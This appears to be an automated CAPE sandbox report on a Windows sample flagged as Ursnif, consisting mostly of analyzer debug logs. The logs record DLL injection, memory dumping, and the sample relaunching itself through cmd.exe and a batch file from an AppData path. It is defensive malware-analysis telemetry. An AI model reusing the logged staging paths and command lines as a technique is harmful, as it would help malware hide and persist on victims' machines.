CAPE

Detections: Ursnif


Analysis

Category: FILE
Package: Extraction
Started: 2020-03-24 09:47:00
Completed: 2020-03-24 09:50:57
Duration: 237 seconds
Options:
route = internet
procdump = 0
2020-03-24 09:47:01,000 [root] INFO: Date set to: 03-24-20, time set to: 09:47:01, timeout set to: 200
2020-03-24 09:47:01,046 [root] DEBUG: Starting analyzer from: C:\ejkbjgk
2020-03-24 09:47:01,046 [root] DEBUG: Storing results at: C:\aWpAMaeYY
2020-03-24 09:47:01,046 [root] DEBUG: Pipe server name: \\.\PIPE\EqkKvCpskh
2020-03-24 09:47:01,046 [root] INFO: Analysis package "Extraction" has been specified.
2020-03-24 09:47:02,855 [root] DEBUG: Started auxiliary module Browser
2020-03-24 09:47:02,855 [root] DEBUG: Started auxiliary module Curtain
2020-03-24 09:47:02,855 [modules.auxiliary.digisig] DEBUG: Checking for a digitial signature.
2020-03-24 09:47:03,808 [modules.auxiliary.digisig] DEBUG: File is not signed.
2020-03-24 09:47:03,808 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2020-03-24 09:47:03,808 [root] DEBUG: Started auxiliary module DigiSig
2020-03-24 09:47:03,808 [root] DEBUG: Started auxiliary module Disguise
2020-03-24 09:47:03,808 [root] DEBUG: Started auxiliary module Human
2020-03-24 09:47:03,808 [root] DEBUG: Started auxiliary module Screenshots
2020-03-24 09:47:03,822 [root] DEBUG: Started auxiliary module Sysmon
2020-03-24 09:47:03,822 [root] DEBUG: Started auxiliary module Usage
2020-03-24 09:47:03,822 [root] INFO: Analyzer: DLL set to Extraction.dll from package modules.packages.Extraction
2020-03-24 09:47:03,822 [root] INFO: Analyzer: DLL_64 set to Extraction_x64.dll from package modules.packages.Extraction
2020-03-24 09:47:03,838 [lib.api.process] INFO: Successfully executed process from path "C:\Users\user\AppData\Local\Temp\LjejZswGjULF7Ng.exe" with arguments "" with pid 420
2020-03-24 09:47:03,838 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-03-24 09:47:03,838 [lib.api.process] INFO: 32-bit DLL to inject is C:\ejkbjgk\dll\muIYPR.dll, loader C:\ejkbjgk\bin\qeYgInZ.exe
2020-03-24 09:47:03,869 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\EqkKvCpskh.
2020-03-24 09:47:03,869 [root] DEBUG: Loader: Injecting process 420 (thread 264) with C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:03,869 [root] DEBUG: Process image base: 0x00400000
2020-03-24 09:47:03,901 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:03,901 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 09:47:03,901 [root] DEBUG: Successfully injected DLL C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:03,901 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 420
2020-03-24 09:47:05,914 [lib.api.process] INFO: Successfully resumed process with pid 420
2020-03-24 09:47:05,914 [root] INFO: Added new process to list with pid: 420
2020-03-24 09:47:06,069 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 09:47:06,069 [root] DEBUG: Process dumps disabled.
2020-03-24 09:47:06,131 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 09:47:06,131 [root] INFO: Disabling sleep skipping.
2020-03-24 09:47:06,131 [root] INFO: Disabling sleep skipping.
2020-03-24 09:47:06,131 [root] INFO: Disabling sleep skipping.
2020-03-24 09:47:06,131 [root] INFO: Disabling sleep skipping.
2020-03-24 09:47:06,131 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x7716124a, Wow64PrepareForException: 0x0
2020-03-24 09:47:06,131 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x3b0000
2020-03-24 09:47:06,131 [root] DEBUG: Debugger initialised.
2020-03-24 09:47:06,131 [root] DEBUG: CAPE initialised: 32-bit Extraction package loaded in process 420 at 0x74870000, image base 0x400000, stack from 0x186000-0x190000
2020-03-24 09:47:06,131 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Local\Temp\LjejZswGjULF7Ng.exe".
2020-03-24 09:47:06,131 [root] DEBUG: AddTrackedRegion: GetTrackedRegion(0x00400000) returned 0x00000000.
2020-03-24 09:47:06,131 [root] DEBUG: AddTrackedRegion: Created new tracked region: TrackedRegion->AllocationBase 0x00000000.
2020-03-24 09:47:06,131 [root] DEBUG: AddTrackedRegion: VirtualQuery(0x00400000) -> AllocationBase 0x00400000 RegionSize 0x4096.
2020-03-24 09:47:06,131 [root] DEBUG: AddTrackedRegion: EntryPoint 0x5493, Entropy 7.765381e+00
2020-03-24 09:47:06,131 [root] DEBUG: AddTrackedRegion: New region at 0x00400000 size 0x1000 added to tracked regions.
2020-03-24 09:47:06,131 [root] DEBUG: ExtractionInit: Adding main image base to tracked regions.
2020-03-24 09:47:06,131 [root] INFO: Monitor successfully loaded in process with pid 420.
2020-03-24 09:47:06,148 [root] DEBUG: DLL loaded at 0x74500000: C:\Windows\system32\asycfilt (0x14000 bytes).
2020-03-24 09:47:06,413 [root] DEBUG: set_caller_info: Adding region at 0x03950000 to caller regions list (ntdll::LdrGetDllHandle).
2020-03-24 09:47:06,413 [root] DEBUG: Allocation: 0x003C0000 - 0x003C1000, size: 0x1000, protection: 0x40.
2020-03-24 09:47:06,413 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000.
2020-03-24 09:47:06,427 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00400000.
2020-03-24 09:47:06,427 [root] DEBUG: ProcessImageBase: EP 0x00005493 image base 0x00400000 size 0x0 entropy 7.765580e+00.
2020-03-24 09:47:06,427 [root] DEBUG: AllocationHandler: Adding allocation to tracked region list: 0x003C0000, size: 0x1000.
2020-03-24 09:47:06,427 [root] DEBUG: AddTrackedRegion: GetTrackedRegion(0x003C0000) returned 0x00000000.
2020-03-24 09:47:06,427 [root] DEBUG: AddTrackedRegion: Created new tracked region: TrackedRegion->AllocationBase 0x00000000.
2020-03-24 09:47:06,427 [root] DEBUG: AddTrackedRegion: VirtualQuery(0x003C0000) -> AllocationBase 0x003C0000 RegionSize 0x4096.
2020-03-24 09:47:06,427 [root] DEBUG: AddTrackedRegion: New region at 0x003C0000 size 0x1000 added to tracked regions.
2020-03-24 09:47:06,427 [root] DEBUG: set_caller_info: Adding region at 0x003C0000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-03-24 09:47:06,427 [root] DEBUG: set_caller_info: Caller at 0x003C05FF in tracked regions.
2020-03-24 09:47:06,427 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000.
2020-03-24 09:47:06,427 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00400000.
2020-03-24 09:47:06,427 [root] DEBUG: ProcessImageBase: EP 0x00005493 image base 0x00400000 size 0x0 entropy 7.765580e+00.
2020-03-24 09:47:06,427 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x003C0000.
2020-03-24 09:47:06,427 [root] DEBUG: DumpPEsInRange: Scanning range 0x3c0000 - 0x3c1000.
2020-03-24 09:47:06,427 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x3c0000-0x3c1000.
2020-03-24 09:47:06,427 [root] DEBUG: DumpPEsInTrackedRegion: No PE images found in range range 0x003C0000 - 0x003C1000.
2020-03-24 09:47:06,427 [root] DEBUG: set_caller_info: Adding region at 0x020D0000 to caller regions list (kernel32::GetSystemTime).
2020-03-24 09:47:06,427 [root] DEBUG: DumpPEsInRange: Scanning range 0x3c0000 - 0x3c1000.
2020-03-24 09:47:06,427 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x3c0000-0x3c1000.
2020-03-24 09:47:06,427 [root] DEBUG: DumpPEsInTrackedRegion: No PE images found in range range 0x003C0000 - 0x003C1000.
2020-03-24 09:47:06,427 [root] DEBUG: DumpMemory: CAPE output file C:\aWpAMaeYY\CAPE\420_5287705206471224232020 successfully created, size 0x1000
2020-03-24 09:47:06,427 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\420_5287705206471224232020
2020-03-24 09:47:06,427 [root] DEBUG: DumpRegion: Dumped stack region from 0x003C0000, size 0x1000.
2020-03-24 09:47:06,427 [root] DEBUG: ProcessTrackedRegion: dumped executable memory range at 0x003C0000.
2020-03-24 09:47:06,427 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x3c0000 - 0x3c1000.
2020-03-24 09:47:06,427 [root] DEBUG: DumpMemory: CAPE output file C:\aWpAMaeYY\CAPE\420_4677356326471224232020 successfully created, size 0x1000
2020-03-24 09:47:06,444 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\420_4677356326471224232020
2020-03-24 09:47:06,444 [root] DEBUG: DumpRegion: Dumped stack region from 0x003C0000, size 0x1000.
2020-03-24 09:47:06,444 [root] DEBUG: ProcessTrackedRegion: dumped executable memory range at 0x003C0000.
2020-03-24 09:47:06,444 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x3c0000 - 0x3c1000.
2020-03-24 09:47:06,444 [root] DEBUG: ProtectionHandler: Address 0x00401000 already in tracked region at 0x00400000, size 0x1000
2020-03-24 09:47:06,444 [root] DEBUG: ProtectionHandler: Address: 0x00401000 (alloc base 0x00400000), NumberOfBytesToProtect: 0x6000, NewAccessProtection: 0x20
2020-03-24 09:47:06,444 [root] DEBUG: ProtectionHandler: Increased region size at 0x00401000 to 0x7000.
2020-03-24 09:47:06,444 [root] DEBUG: ProtectionHandler: Updated region protection at 0x00401000 to 0x20.
2020-03-24 09:47:06,444 [root] DEBUG: ProcessImageBase: EP 0x000010E7 image base 0x00400000 size 0x0 entropy 7.796518e+00.
2020-03-24 09:47:06,444 [root] DEBUG: ProcessImageBase: Modified entry point (0x000010E7) detected at image base 0x00400000 - dumping.
2020-03-24 09:47:06,444 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:47:06,444 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2020-03-24 09:47:06,444 [root] DEBUG: DumpProcess: Module entry point VA is 0x000010E7.
2020-03-24 09:47:06,444 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\420_609005564647924232020
2020-03-24 09:47:06,444 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x8a00.
2020-03-24 09:47:06,460 [root] DEBUG: DLL loaded at 0x75A70000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2020-03-24 09:47:06,460 [root] DEBUG: DLL loaded at 0x75A10000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2020-03-24 09:47:06,460 [root] DEBUG: DLL loaded at 0x75980000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2020-03-24 09:47:06,460 [root] DEBUG: DLL loaded at 0x75D40000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2020-03-24 09:47:06,474 [root] DEBUG: DLL loaded at 0x75E70000: C:\Windows\syswow64\SHELL32 (0xc4a000 bytes).
2020-03-24 09:47:18,767 [root] DEBUG: DLL loaded at 0x75470000: C:\Windows\syswow64\WINTRUST (0x2d000 bytes).
2020-03-24 09:47:18,829 [root] DEBUG: DLL loaded at 0x74400000: C:\Windows\system32\PROPSYS (0xf5000 bytes).
2020-03-24 09:47:18,829 [root] DEBUG: DLL loaded at 0x74260000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2020-03-24 09:47:18,829 [root] DEBUG: DLL loaded at 0x74EB0000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2020-03-24 09:47:18,845 [root] DEBUG: DLL loaded at 0x74940000: C:\Windows\system32\ntmarta (0x21000 bytes).
2020-03-24 09:47:18,861 [root] DEBUG: DLL loaded at 0x747D0000: C:\Windows\system32\profapi (0xb000 bytes).
2020-03-24 09:47:18,861 [root] DEBUG: DLL unloaded from 0x75E70000.
2020-03-24 09:47:18,877 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2020-03-24 09:47:18,940 [root] DEBUG: DLL loaded at 0x74200000: C:\Windows\System32\shdocvw (0x2e000 bytes).
2020-03-24 09:47:18,954 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\SysWOW64\urlmon (0x136000 bytes).
2020-03-24 09:47:19,002 [root] DEBUG: DLL loaded at 0x75600000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2020-03-24 09:47:19,002 [root] DEBUG: DLL loaded at 0x76CA0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2020-03-24 09:47:19,079 [root] INFO: Announced 32-bit process name: cmd.exe pid: 2872
2020-03-24 09:47:19,079 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-03-24 09:47:19,079 [lib.api.process] INFO: 32-bit DLL to inject is C:\ejkbjgk\dll\muIYPR.dll, loader C:\ejkbjgk\bin\qeYgInZ.exe
2020-03-24 09:47:19,079 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\EqkKvCpskh.
2020-03-24 09:47:19,079 [root] DEBUG: Loader: Injecting process 2872 (thread 1748) with C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:19,079 [root] DEBUG: Process image base: 0x4A310000
2020-03-24 09:47:19,079 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:19,079 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 09:47:19,079 [root] DEBUG: Successfully injected DLL C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:19,079 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2872
2020-03-24 09:47:19,095 [root] INFO: Announced 32-bit process name: cmd.exe pid: 2872
2020-03-24 09:47:19,095 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-03-24 09:47:19,095 [lib.api.process] INFO: 32-bit DLL to inject is C:\ejkbjgk\dll\muIYPR.dll, loader C:\ejkbjgk\bin\qeYgInZ.exe
2020-03-24 09:47:19,095 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\EqkKvCpskh.
2020-03-24 09:47:19,095 [root] DEBUG: Loader: Injecting process 2872 (thread 1748) with C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:19,095 [root] DEBUG: Process image base: 0x4A310000
2020-03-24 09:47:19,095 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:19,095 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 09:47:19,095 [root] DEBUG: Successfully injected DLL C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:19,095 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2872
2020-03-24 09:47:19,095 [root] DEBUG: DLL unloaded from 0x74F40000.
2020-03-24 09:47:19,095 [root] DEBUG: DLL unloaded from 0x75E70000.
2020-03-24 09:47:19,095 [root] DEBUG: DLL unloaded from 0x74200000.
2020-03-24 09:47:19,095 [root] DEBUG: DLL unloaded from 0x74400000.
2020-03-24 09:47:19,095 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 09:47:19,095 [root] DEBUG: NtTerminateProcess hook: Processing tracked regions before shutdown (process 420).
2020-03-24 09:47:19,095 [root] DEBUG: Process dumps disabled.
2020-03-24 09:47:19,095 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000.
2020-03-24 09:47:19,095 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00400000.
2020-03-24 09:47:19,111 [root] INFO: Disabling sleep skipping.
2020-03-24 09:47:19,111 [root] DEBUG: ProcessImageBase: EP 0x000010E7 image base 0x00400000 size 0x0 entropy 7.678644e+00.
2020-03-24 09:47:19,111 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x003C0000.
2020-03-24 09:47:19,111 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 09:47:19,111 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x7716124a, Wow64PrepareForException: 0x0
2020-03-24 09:47:19,111 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0xc0000
2020-03-24 09:47:19,111 [root] DEBUG: Debugger initialised.
2020-03-24 09:47:19,111 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x407000.
2020-03-24 09:47:19,111 [root] DEBUG: CAPE initialised: 32-bit Extraction package loaded in process 2872 at 0x74870000, image base 0x4a310000, stack from 0x193000-0x290000
2020-03-24 09:47:19,111 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2020-03-24 09:47:19,111 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\cmd \c ""C:\Users\user\AppData\Local\Temp\E502\D8E1.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE"".
2020-03-24 09:47:19,111 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:47:19,111 [root] DEBUG: AddTrackedRegion: GetTrackedRegion(0x4A310000) returned 0x00000000.
2020-03-24 09:47:19,111 [root] DEBUG: AddTrackedRegion: Created new tracked region: TrackedRegion->AllocationBase 0x00000000.
2020-03-24 09:47:19,111 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2020-03-24 09:47:19,111 [root] DEBUG: AddTrackedRegion: VirtualQuery(0x4A310000) -> AllocationBase 0x4A310000 RegionSize 0x4096.
2020-03-24 09:47:19,111 [root] DEBUG: DumpProcess: Module entry point VA is 0x000010E7.
2020-03-24 09:47:19,111 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x407000.
2020-03-24 09:47:19,111 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2020-03-24 09:47:19,111 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:47:19,111 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2020-03-24 09:47:19,127 [root] DEBUG: DumpProcess: Module entry point VA is 0x000010E7.
2020-03-24 09:47:19,127 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\420_64923645939471224232020
2020-03-24 09:47:19,127 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x8200.
2020-03-24 09:47:19,127 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400200-0x407000.
2020-03-24 09:47:19,127 [root] DEBUG: DumpPEsInTrackedRegion: Dumped 1 PE image(s) from range 0x00400000 - 0x00407000.
2020-03-24 09:47:19,127 [root] DEBUG: AddTrackedRegion: EntryPoint 0x829a, Entropy 4.485988e+00
2020-03-24 09:47:19,127 [root] DEBUG: ProcessTrackedRegion: Found and dumped PE image(s) in range 0x00400000 - 0x00407000.
2020-03-24 09:47:19,127 [root] DEBUG: AddTrackedRegion: New region at 0x4A310000 size 0x1000 added to tracked regions.
2020-03-24 09:47:19,127 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x400000 - 0x407000.
2020-03-24 09:47:19,127 [root] DEBUG: ExtractionInit: Adding main image base to tracked regions.
2020-03-24 09:47:19,127 [root] INFO: Added new process to list with pid: 2872
2020-03-24 09:47:19,127 [root] INFO: Monitor successfully loaded in process with pid 2872.
2020-03-24 09:47:19,127 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\420_39546201239471224232020
2020-03-24 09:47:19,127 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x8200.
2020-03-24 09:47:19,127 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400200-0x407000.
2020-03-24 09:47:19,127 [root] DEBUG: DumpPEsInTrackedRegion: Dumped 1 PE image(s) from range 0x00400000 - 0x00407000.
2020-03-24 09:47:19,127 [root] DEBUG: ProcessTrackedRegion: Found and dumped PE image(s) in range 0x00400000 - 0x00407000.
2020-03-24 09:47:19,127 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x400000 - 0x407000.
2020-03-24 09:47:19,141 [root] INFO: Announced 32-bit process name: cmd.exe pid: 992
2020-03-24 09:47:19,141 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-03-24 09:47:19,141 [lib.api.process] INFO: 32-bit DLL to inject is C:\ejkbjgk\dll\muIYPR.dll, loader C:\ejkbjgk\bin\qeYgInZ.exe
2020-03-24 09:47:19,141 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\EqkKvCpskh.
2020-03-24 09:47:19,141 [root] DEBUG: Loader: Injecting process 992 (thread 1428) with C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:19,141 [root] DEBUG: Process image base: 0x4A310000
2020-03-24 09:47:19,141 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:19,141 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 09:47:19,141 [root] DEBUG: DLL unloaded from 0x75140000.
2020-03-24 09:47:19,141 [root] DEBUG: Successfully injected DLL C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:19,157 [root] DEBUG: DLL unloaded from 0x74940000.
2020-03-24 09:47:19,157 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 992
2020-03-24 09:47:19,157 [root] DEBUG: NtTerminateProcess hook: Processing tracked regions before shutdown (process 420).
2020-03-24 09:47:19,157 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000.
2020-03-24 09:47:19,157 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2020-03-24 09:47:19,157 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00400000.
2020-03-24 09:47:19,157 [root] DEBUG: ProcessImageBase: EP 0x000010E7 image base 0x00400000 size 0x0 entropy 7.678644e+00.
2020-03-24 09:47:19,157 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x003C0000.
2020-03-24 09:47:19,157 [root] INFO: Notified of termination of process with pid 420.
2020-03-24 09:47:19,174 [root] INFO: Announced 32-bit process name: cmd.exe pid: 992
2020-03-24 09:47:19,174 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-03-24 09:47:19,174 [lib.api.process] INFO: 32-bit DLL to inject is C:\ejkbjgk\dll\muIYPR.dll, loader C:\ejkbjgk\bin\qeYgInZ.exe
2020-03-24 09:47:19,204 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\EqkKvCpskh.
2020-03-24 09:47:19,204 [root] DEBUG: Loader: Injecting process 992 (thread 1428) with C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:19,220 [root] DEBUG: Process image base: 0x4A310000
2020-03-24 09:47:19,236 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:19,236 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 09:47:19,236 [root] DEBUG: Successfully injected DLL C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:19,236 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 992
2020-03-24 09:47:19,252 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 09:47:19,252 [root] DEBUG: Process dumps disabled.
2020-03-24 09:47:19,266 [root] INFO: Disabling sleep skipping.
2020-03-24 09:47:19,266 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 09:47:19,266 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x7716124a, Wow64PrepareForException: 0x0
2020-03-24 09:47:19,266 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x170000
2020-03-24 09:47:19,282 [root] DEBUG: Debugger initialised.
2020-03-24 09:47:19,282 [root] DEBUG: CAPE initialised: 32-bit Extraction package loaded in process 992 at 0x74870000, image base 0x4a310000, stack from 0x273000-0x370000
2020-03-24 09:47:19,282 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\cmd  \C ""C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE"".
2020-03-24 09:47:19,282 [root] DEBUG: AddTrackedRegion: GetTrackedRegion(0x4A310000) returned 0x00000000.
2020-03-24 09:47:19,298 [root] DEBUG: AddTrackedRegion: Created new tracked region: TrackedRegion->AllocationBase 0x00000000.
2020-03-24 09:47:19,298 [root] DEBUG: AddTrackedRegion: VirtualQuery(0x4A310000) -> AllocationBase 0x4A310000 RegionSize 0x4096.
2020-03-24 09:47:19,298 [root] DEBUG: AddTrackedRegion: EntryPoint 0x829a, Entropy 4.485988e+00
2020-03-24 09:47:19,298 [root] DEBUG: AddTrackedRegion: New region at 0x4A310000 size 0x1000 added to tracked regions.
2020-03-24 09:47:19,298 [root] DEBUG: ExtractionInit: Adding main image base to tracked regions.
2020-03-24 09:47:19,298 [root] INFO: Added new process to list with pid: 992
2020-03-24 09:47:19,298 [root] INFO: Monitor successfully loaded in process with pid 992.
2020-03-24 09:47:19,313 [root] INFO: Announced 32-bit process name: corrawex.exe pid: 2512
2020-03-24 09:47:19,313 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-03-24 09:47:19,313 [lib.api.process] INFO: 32-bit DLL to inject is C:\ejkbjgk\dll\muIYPR.dll, loader C:\ejkbjgk\bin\qeYgInZ.exe
2020-03-24 09:47:19,313 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\EqkKvCpskh.
2020-03-24 09:47:19,313 [root] DEBUG: Loader: Injecting process 2512 (thread 1304) with C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:19,313 [root] DEBUG: Process image base: 0x00400000
2020-03-24 09:47:19,313 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:19,313 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 09:47:19,329 [root] DEBUG: Successfully injected DLL C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:19,329 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2512
2020-03-24 09:47:19,329 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2020-03-24 09:47:19,345 [root] INFO: Announced 32-bit process name: corrawex.exe pid: 2512
2020-03-24 09:47:19,345 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-03-24 09:47:19,345 [lib.api.process] INFO: 32-bit DLL to inject is C:\ejkbjgk\dll\muIYPR.dll, loader C:\ejkbjgk\bin\qeYgInZ.exe
2020-03-24 09:47:19,345 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\EqkKvCpskh.
2020-03-24 09:47:19,345 [root] DEBUG: Loader: Injecting process 2512 (thread 1304) with C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:19,345 [root] DEBUG: Process image base: 0x00400000
2020-03-24 09:47:19,345 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:19,361 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 09:47:19,361 [root] DEBUG: Successfully injected DLL C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:19,361 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2512
2020-03-24 09:47:19,361 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 09:47:19,361 [root] DEBUG: Process dumps disabled.
2020-03-24 09:47:19,391 [root] INFO: Disabling sleep skipping.
2020-03-24 09:47:19,391 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 09:47:19,391 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x7716124a, Wow64PrepareForException: 0x0
2020-03-24 09:47:19,391 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x3d0000
2020-03-24 09:47:19,391 [root] DEBUG: Debugger initialised.
2020-03-24 09:47:19,391 [root] DEBUG: CAPE initialised: 32-bit Extraction package loaded in process 2512 at 0x74870000, image base 0x400000, stack from 0x186000-0x190000
2020-03-24 09:47:19,391 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe"  "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE".
2020-03-24 09:47:19,407 [root] DEBUG: AddTrackedRegion: GetTrackedRegion(0x00400000) returned 0x00000000.
2020-03-24 09:47:19,407 [root] DEBUG: AddTrackedRegion: Created new tracked region: TrackedRegion->AllocationBase 0x00000000.
2020-03-24 09:47:19,407 [root] DEBUG: AddTrackedRegion: VirtualQuery(0x00400000) -> AllocationBase 0x00400000 RegionSize 0x4096.
2020-03-24 09:47:19,407 [root] DEBUG: AddTrackedRegion: EntryPoint 0x5493, Entropy 7.765386e+00
2020-03-24 09:47:19,407 [root] DEBUG: AddTrackedRegion: New region at 0x00400000 size 0x1000 added to tracked regions.
